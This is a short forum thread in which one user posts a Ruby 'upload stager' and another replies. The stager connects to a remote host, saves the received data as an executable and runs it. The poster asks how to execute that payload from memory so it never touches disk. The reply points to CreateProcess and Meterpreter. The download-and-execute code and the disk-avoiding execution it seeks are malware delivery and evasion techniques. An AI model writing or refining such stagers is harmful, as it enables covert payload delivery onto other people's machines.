Results 1 to 2 of 2

Thread: upload stager... technique?

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default upload stager... technique?

    ill try to explain the best i can... (win32)

    upload.exe.rb
    Code:
    sock = TCPSocket.open('666', '192.168.1.5')
      # read data from a socket then write to a file...
    	data = sock.read
    	destFile = File.open('c:\someplace\file.exe', "wb")
    	destFile.print data.rstrip
    	destFile.close
    
    puts "executing payload"
    exec = Thread.new { system "c:\someplace\file.exe" }
    exec.run
    
    sleep 100 #stay alive for a long time
    this is a vary simple download and execute function... this client will read data from a host, write this data to a file and then execute the file...

    so, now you have 2 process's running (client.exe and file.exe) instead of writing this data to a file i would like to execute this data from within client.exe

    i dont want file.exe touching the hard drive, i just want to execute the binary data...

    any ideas to better my search results?

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    What you are trying to do is execute a program from a memory location.

    I don't know how ruby does it (meterpreter is written in C, perhaps C++ if my SVN logs are correct), but doing it via a C call is "CreateProcess" and pointing the file pointer at a memory location - or something very similar.

    Side Note: A lot of people immediately assume viral intent when you write one of these, be careful where you start googling this information!
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •